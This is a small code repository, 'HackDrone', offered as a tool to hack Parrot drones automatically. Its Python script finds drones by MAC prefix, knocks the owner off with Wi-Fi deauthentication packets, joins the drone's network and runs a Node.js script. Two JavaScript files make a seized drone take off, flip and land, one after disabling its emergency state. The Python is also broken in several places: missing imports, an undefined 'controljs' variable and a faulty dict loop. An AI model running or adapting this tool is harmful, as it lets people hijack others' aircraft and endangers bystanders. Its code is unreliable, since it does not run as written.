├── README.md
├── flip.js
├── get_lost.js
└── hawkdrone.py


/README.md:
--------------------------------------------------------------------------------
1 | # HackDrone
2 | A Python script to hack parrot drones automatically. It allows to spawn a shell on the drone to control it.
3 | 


--------------------------------------------------------------------------------
/flip.js:
--------------------------------------------------------------------------------
 1 | var arDrone = require('ar-drone');
 2 | var client  = arDrone.createClient();
 3 | 
 4 | client.takeoff();
 5 | 
 6 | client
 7 | /*  .after(2000, function() {
 8 |     this.up(1);
 9 |   })
10 | */
11 |   .after(4000, function() {
12 |     this.animate('flipLeft', 14);
13 |   })
14 |   .after(6000, function() {
15 |     this.animate('flipRight', 14);
16 |   })
17 | 
18 |   .after(6000, function() {
19 |     this.animate('flipLeft', 14);
20 |   })
21 | 
22 |   .after(4000, function() {
23 |     this.land();
24 |   });
25 | 


--------------------------------------------------------------------------------
/get_lost.js:
--------------------------------------------------------------------------------
 1 | var arDrone = require('ar-drone');
 2 | var http    = require('http');
 3 | 
 4 | var client = arDrone.createClient();
 5 | client.disableEmergency();
 6 | 
 7 | 
 8 |   console.log('Start');
 9 |   client.takeoff();
10 |   client.after(4000, function() {
11 |       this.stop();
12 |     })
13 | 
14 | 
15 |   client.animate('flipLeft', 1000);
16 |   
17 | 
18 |   client
19 | 
20 | /*    .after(4000, function() {
21 |       this.up(1);
22 |     })
23 | 
24 |     .after(11000, function() {
25 |       this.stop();
26 |       this.front(1);
27 |     })
28 | 
29 |     .after(1000, function() {
30 |       this.stop();
31 |       this.animate('flipLeft', 3000);
32 |     })
33 | 
34 | 
35 | /*    .after(2000, function() {
36 |       this.stop();
37 |       this.clockwise(-0.5);
38 |     })
39 | 
40 |     .after(4000, function() {
41 |       this.stop();
42 |       this.front(1);
43 | //      this.animate('flipLeft', 1000);
44 |     })
45 | */
46 |     .after(3000, function() {
47 |       this.stop();
48 |       this.land();
49 |     })
50 | 
51 | 


--------------------------------------------------------------------------------
/hawkdrone.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python3
  2 | import argparse
  3 | import glob
  4 | import os
  5 | import shlex
  6 | import subprocess
  7 | import time
  8 | 
  9 | # get command line arguments
 10 | parser = argparse.ArgumentParser(description='hawkdrone main function')
 11 | parser.add_argument('wlan1', nargs='?', default='wlan1', metavar='wlan1', help='the wlan interface to be put into monitor mode')
 12 | parser.add_argument('wlan2', nargs='?', default='wlan2', metavar='wlan2', help='the wlan interface to connect to the drone wifi')
 13 | 
 14 | args = parser.parse_args()
 15 | 
 16 | # mac addresses of Parrot drones
 17 | parrot_macs = ['90:03:B7', 'A0:14:3D', '00:12:1C', '00:26:7E']
 18 | 
 19 | # initialize main variables
 20 | wlan1 = args.wlan1
 21 | wlan2 = args.wlan2
 22 | 
 23 | dhclient = 'dhclient'
 24 | iwconfig = 'iwconfig';
 25 | ifconfig = 'ifconfig';
 26 | airmon = 'airmon-ng';
 27 | aireplay = 'aireplay-ng';
 28 | aircrack = 'aircrack-ng';
 29 | airodump = 'airodump-ng';
 30 | nodejs = 'nodejs';
 31 | 
 32 | tmpfile = '/tmp/airodump'
 33 | 
 34 | # results variables
 35 | wifis = {} # WLAN channels used
 36 | clients = {} # drone owners connected to drone WLANs
 37 | 
 38 | # execute system call with sudo
 39 | def sudo(*args):
 40 | 	command = 'sudo '
 41 | 	
 42 | 	for arg in args:
 43 | 		command += str(arg) + ' '
 44 | 	
 45 | 	os.system(command)
 46 | 	
 47 | def disconnect(aireplay, access_point, client, interface):
 48 | 	print('Jumping onto drone\'s channel ' + channel)
 49 | 	sudo(iwconfig, wlan1, "channel", channel);
 50 | 	time.sleep(1)
 51 | 	
 52 | 	print('Disconnecting the true owner of the drone')
 53 | 	sudo(aireplay, '-0', '3', '-a', access_point, '-c', client, interface)
 54 | 	print('Done disconnecting the true owner of the drone')
 55 | 	
 56 | # print to stderr
 57 | def eprint(*args, **kwargs):
 58 | 	print(*args, file=sys.stderr, **kwargs)
 59 | 
 60 | while True:
 61 | 	# look for Access Points and write to tmpfile
 62 | 	cmd = 'sudo ' + airodump + ' --output-format csv -w ' + tmpfile + ' ' + wlan1
 63 | 
 64 | 	with open('/dev/null') as null:
 65 | 		process = subprocess.Popen(shlex.split(cmd), stdout=null, stderr=null)
 66 | 	
 67 | 	pid = process.pid
 68 | 	print('airodump pid: ' + str(pid))
 69 | 
 70 | 	# wait for 6 seconds in total
 71 | 	time.sleep(3)
 72 | 	sudo('kill', pid)
 73 | 	time.sleep(1)
 74 | 	sudo('kill', '-HUP', pid)
 75 | 	time.sleep(1)
 76 | 	sudo('kill', '-9', pid)
 77 | 	time.sleep(1)
 78 | 	sudo('killall', '-9', aireplay, airodump)
 79 | 	
 80 | 	# read Access Points from tmpfile
 81 | 	for filename in glob.glob(tmpfile + '+.csv'):
 82 | 		# iterate over each line
 83 | 		with open(filename) as file:
 84 | 			for line in file:
 85 | 				# check if line contains any of the known Parrot MAC addresses
 86 | 				for mac in parrot_macs:
 87 | 					# get drone MAC address (1), drone WLAN channel (2) and drone Wifi name (3)
 88 | 					pattern = re.compile('^(' + mac + ':[\w:]+),\s+\S+\s+\S+\s+\S+\s+\S+\s+(\d+),.*(ardrone\S+),')
 89 | 					match = pattern.match(line)
 90 | 					
 91 | 					if match:
 92 | 						print('CHANNEL ' + match.group(1) + ' ' + match.group(2) + ' ' + match.group(3))
 93 | 						wifis[match.group(1)] = [match.group(2), match.group(3)]
 94 | 					
 95 | 					# get drone owner's MAC address (1) and drone MAC address (2)
 96 | 					pattern = re.compile('^([\w:]+).*\s(' + mac + ' + :[\w:]+),')
 97 | 					match = pattern.match(line)
 98 | 					
 99 | 					if match:
100 | 						print('CLIENT ' + match.group(1) + ' ' + match.group(2))
101 | 						clients[match.group(1)] = match.group(2)
102 | 					
103 | 		#sudo('rm', filename)
104 | 	
105 | 	# disconnect original owner
106 | 	for owner_mac, drone_mac in clients.items():
107 | 		channel = wifis[drone_mac][0]
108 | 		ssid = wifis[drone_mac][1]
109 | 		print('Found client (' + owner_mac + ') connected to ' + ssid + ' (' + drone_mac + ', channel ' + channel + ')')
110 | 		
111 | 		disconnect(aireplay, drone_mac, owner_mac, wlan2)
112 | 		
113 | 	# connect to drone and run our code
114 | 	for drone_mac, wifi_info in wifis:
115 | 		channel = wifi_info[0]
116 | 		ssid = wifi_info[1]
117 | 		
118 | 		print('Connecting to wifi ' + ssid + ' (MAC address ' + drone_mac)
119 | 		sudo(iwconfig, wlan2, 'essid', ssid)
120 | 		sudo('ifup', wlan2)
121 | 		
122 | 		print('Acquiring IP from drone')
123 | 		sudo(dhclient, '-v', wlan2)
124 | 		
125 | 		print('Taking over drone')
126 | 		sudo(nodejs, controljs)
127 | 
128 | 
129 | # put both devices down
130 | sudo(ifconfig, wlan1, 'down')
131 | sudo(ifconfig, wlan2, 'down')


--------------------------------------------------------------------------------